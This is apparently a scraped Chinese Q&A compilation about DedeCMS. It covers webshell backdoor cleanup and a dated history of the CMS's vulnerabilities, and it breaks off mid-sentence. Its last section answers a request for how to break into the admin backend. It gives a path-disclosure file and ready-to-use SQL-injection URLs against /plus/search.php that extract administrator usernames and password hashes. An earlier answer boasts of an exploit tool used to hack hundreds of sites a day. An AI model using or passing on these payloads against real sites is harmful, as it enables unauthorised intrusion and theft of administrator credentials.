dedecms爆(Dedecms)

今天给各位分享dedecms爆的知识，其中也会对Dedecms进行解释，如果能碰巧解决你现在面临的问题，别忘了关注本站，现在开始吧！

本文目录一览：

1、织梦dedecms被挂马 /plus/90sec.php怎么修复
2、如何看待2011年发生的 DedeCMS 的爆管理员密码漏洞以及 siteserver 的上传漏洞？国内领先的 CMS 厂商技术
3、dedecms好用不，怎么制作dedecms 的模板。还有就是后台安全么听说经常出现漏洞。。
4、dedecms织梦“所有档案列表”页空白没有显示，验证码图片不显示。。
5、织梦的历史漏洞
6、dedecms 的后台怎么爆啊，能告诉我详细一点吗

1、织梦dedecms被挂马 /plus/90sec.php怎么修复

从别的网站上找来的解决方法，不知道能不能。大家自己去试试

DedeCMS不久前爆出的”90sec.php“漏洞，困扰了很多站长朋友，站长反馈“网站木马文件删除后，第二天又重新出现了”。

攻击者利用这个漏洞，把一段恶意PHP代码写入数据库的某个数据字段内，再利用DedeCMS对这个字段里的数据的处理时会执行插入到数据库里的恶意PHP代码，最终导致在目标网站上写入网站木马文件，完全控制这个网站。

所以当站长在删除网站上的木马文件时，并没有删除数据库内的内容，所以当DedeCMS对这个被插入恶意代码的字段里的数据处理时，再次出现了被删除了的网站木马文件。

安全联盟站长平台为DedeCMS的站长量身打造一个“DedeCMS漏洞后门专杀工具”，该工具只需下载放置到Dedecms根目录下运行后，可“一键扫描”查找漏洞、网站木马及数据库里的恶意代码并清除干净。

2、如何看待2011年发生的 DedeCMS 的爆管理员密码漏洞以及 siteserver 的上传漏洞？国内领先的 CMS 厂商技术

每个开源程序都或多或少的存在漏洞，这就需要使用者和开发者一起共同努力，进而进一步完善！

3、dedecms好用不，怎么制作dedecms 的模板。还有就是后台安全么听说经常出现漏洞。。

织梦漏洞确实多如牛毛我在乌龙寺技术站下载过一个织梦漏洞利用工具一天爆几百个菊花，帝国自从2009年后貌似就没出过漏洞。

4、dedecms织梦“所有档案列表”页空白没有显示，验证码图片不显示。。

验证码那一项可以完全关掉，要它也是多余。

后台所有档案列表无法显示，你看下/dede/content_list.php这个文件有没有出错，慢慢调试下。

最近5.7出现很多漏洞，有些问题解决不了就重新下最新版的安装下试试。

织梦做的网站的权限在自己本地的话一般都是全给，上线之后就要把重要的权限都给限定死了，有些无关紧要的可限可不限

5、织梦的历史漏洞

【2011-8-19】 DedeCMS全局变量初始化存在漏洞

描述：可能导致黑客利用漏洞侵入使用DedeCMS的网站服务器，造成网站用户数据泄露、页面被恶意篡改等严重后果。

【2012-3-21】 DedeCMS官方源码被植入后门

描述：导致黑客可以执行任意代码从而控制整个网站或服务器

【2013-3-29】DedeCMS安全漏洞

描述：“本地文件包含漏洞”，发现时为“0day”，官方已修复

【2013-4-1】DedeCMS 爆SQL注入漏洞

描述：乌云平台曝光， “0day”，官方已修复

【2013-5-2】DedeCMS“重安装”高危安全漏洞

描述：被发现“0day”，通知官方修复并启用临时修复方案

【2013-6-4】DedeCMS 高危安全漏洞

描述：此漏洞为“0day”，官方已修复

【2013-9-30】DedeCMS 5.7版本高危漏洞

描述：乌云白帽子上报，“0day”，跨站脚本漏洞，可在前台插入恶意JS代码，黑客已经利用

【2014-1-6】DedeCMS会员投稿跨站脚本漏洞

描述：攻击者可通过“会员投稿”插入恶意代码，后台管理审稿时“中招”可导致网站被黑

【2014-2-17】swfupload.swf跨站漏洞

描述：该漏洞乌云平台上报，站长反馈网站在检测时检测出此漏洞，已提供修复方案

【2014-3-4】DedeCMS多个安全漏洞

描述：包括2个高危及多个曾经预警的官方没修复的漏洞。官方发布补丁修复但没有全部修复

【2014-03-05】dedecmsV5.7.38 GBK正式版20140305常规更新补丁 member/soft_add.php修复功能错误及存在的漏洞member/soft_edit.php修复功能错误及存在的漏洞include/filter.inc.php修复功能错误及存在的漏洞【2014-03-11】dedecmsV5.7.39 GBK正式版20140311常规更新补丁 data/module/606c658db048ea7328ffe1c7ae2a732f.xml新增畅言模块include/helpers/channelunit.helper.php模板标签解析功能完善include/inc/inc_fun_funAdmin.php更新提示站点迁移完善include/taglib/flink.lib.php友情链接标签缓存完善【2014-03-13】dedecmsV5.7.40 GBK正式版20140313常规更新补丁 include/helpers/channelunit.helper.php修复一个标签解析错误【2014-11-28】DEDECMS官方网被黑，黑客在织梦服务器端植入恶意代码，所有织梦用户访问后台时会提示下载1.exe文件，该程序为后门，一旦下载便会感染成为远控端，而且该病毒会实现反复感染。如果用户为IE浏览器，则会直接感染成为远控端。

6、dedecms 的后台怎么爆啊，能告诉我详细一点吗

如果你想找DEDECMS后台路径的话

访问/data/mysql_error_trace.inc 这个文件里有,如果幸运的话你会看到的。

如果是爆管理账号密码，那么你可以试试以下方式。

/plus/search.php?keyword=11typeArr[`@'`and(SELECT%201%20FROM(select%20count(*),concat(floor(rand(0)*2),(SELECT/*'*/concat(0x5f,userid,0x5f,pwd,0x5f)%20from%20`%23@__admin`%20Limit%200,1))a%20from%20information_schema.tables%20group%20by%20a)b)]=1

/plus/search.php?keyword=astypeArr%5B111%3D@%60%5C'%60)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+%60%23@__admin%60+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@%60%5C'%60+%5D=a

Safe Alert: Request Error step 2 !

那么直接用下面的exp

/plus/search.php?keyword=astypeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a

看结果如果提示

Safe Alert: Request Error step 1 !